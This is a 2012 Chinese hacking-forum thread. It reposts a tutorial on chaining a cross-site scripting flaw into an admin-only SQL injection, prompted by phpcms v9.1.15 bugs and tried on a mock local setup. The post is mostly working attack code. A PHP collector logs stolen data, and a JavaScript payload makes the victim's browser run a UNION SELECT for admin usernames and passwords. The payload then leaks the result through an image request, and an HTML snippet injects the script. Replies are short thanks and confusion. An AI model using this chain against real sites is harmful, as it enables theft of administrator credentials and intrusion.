查看: 9773|回复: 4

利用xss 执行sql注入

[复制链接]
  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2012-8-3 17:37:04 | 显示全部楼层 |阅读模式
    转自LN博客,代发
    昨天看见phpcms v9.1.15爆的xss和无权限的sql注入,于是就想测试下利用xss执行sql注入,虽然爆的这个phpcms漏洞还有很多其他的用法!但是,这个注入我没有找到phpcms v9.1.15测试,其他版本都没有测试成功!


    于是乎我只有假想下一个极端环境:
    1.前台有且只有一个xss漏洞(不能获取管理员cookie)
    2.后台有且只有一个sql注入漏洞(注入漏洞文件只有管理员可以访问)
    3.注入获得管理员密码可解密
    4.除以上无其他任何漏洞(包括后台getwebshell)

    其实我就是想说,我们只可以利用这个xss执行注入!



    模拟注入漏洞代码
    sqli.php

    [code=PHP]database:test
    table:test、admin
    column:test.id、test.realname
    admin.id、admin.username、admin.password [/code]


    get.php(获取的注入后数据截取)

    [code=PHP]<?php
    $file = fopen("data.txt","a");
    fwrite($file,$_GET['get']);
    fclose($file);
    ?>



    [/code]


    xsssqli.js(payload)


    [code=PHP]view sourceprint?01 function addLoadEvent(func)//窗口打开加载多个函数
    {
    var oldfunc=window.onload; //页面打开是加载方法
    if(typeof(window.onload)!="function")
    {
    window.onload=func;
    }
    else
    {
    window.onload=function()
    {
    oldfunc();
    func();
    }
    }
    }
    function get_xsssqli()
    {
    var url = "http://127.0.0.1/xss/sqli.php?xss=1%20and%201=2%20union%20select%20username,password%20from%20admin";
    var ajax = null;
    if(window.XMLHttpRequest)
    {
    ajax = new XMLHttpRequest();
    }
    else if(window.ActiveXObject)
    {
    ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本
    }
    else
    {
    return;
    }
    ajax.open("GET", url, true);
    ajax.send(null);
    ajax.onreadystatechange = function()
    {

    if(ajax.readyState == 4 && ajax.status == 200)
    {
    var img = document.createElement("img");
    img.src = "http://127.0.0.1/xss/get.php?get="+ajax.responseText;
    document.body.appendChild(img);
    }
    }
    }
    addLoadEvent(get_xsssqli);
    [/code]




    模拟xss漏洞

    [code=PHP]
    view sourceprint?1 <html>
    <head>
    <title>use xss to sqli</title>
    </head>
    <body>
    <script src=http://127.0.0.1/xss/get.js ></script>
    </body>
    </html>[/code]




    最后成功得到数据:




    当然你也可以写个正则截获指定数据!

    转载请指明出处:L.N.博客  http://lanu.sinaapp.com/htmlcssjisxml/112.html
    回复

    使用道具 举报

    该用户从未签到

    发表于 2012-8-3 19:18:17 | 显示全部楼层
    CSRF么?感谢分享,学习了~~~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-9-3 08:56:28 | 显示全部楼层
    额  我手里也有一个同样的站 有XSS 漏洞   但是 不会  我也看不懂你讲的什么    菜鸟继续学习去了{:soso__9837529008188240882_1:}
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-9-29 17:55:52 | 显示全部楼层
    这个不是很懂
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-9-29 22:33:39 | 显示全部楼层
    xss很流行
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-5-14 05:01 , Processed in 0.044561 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部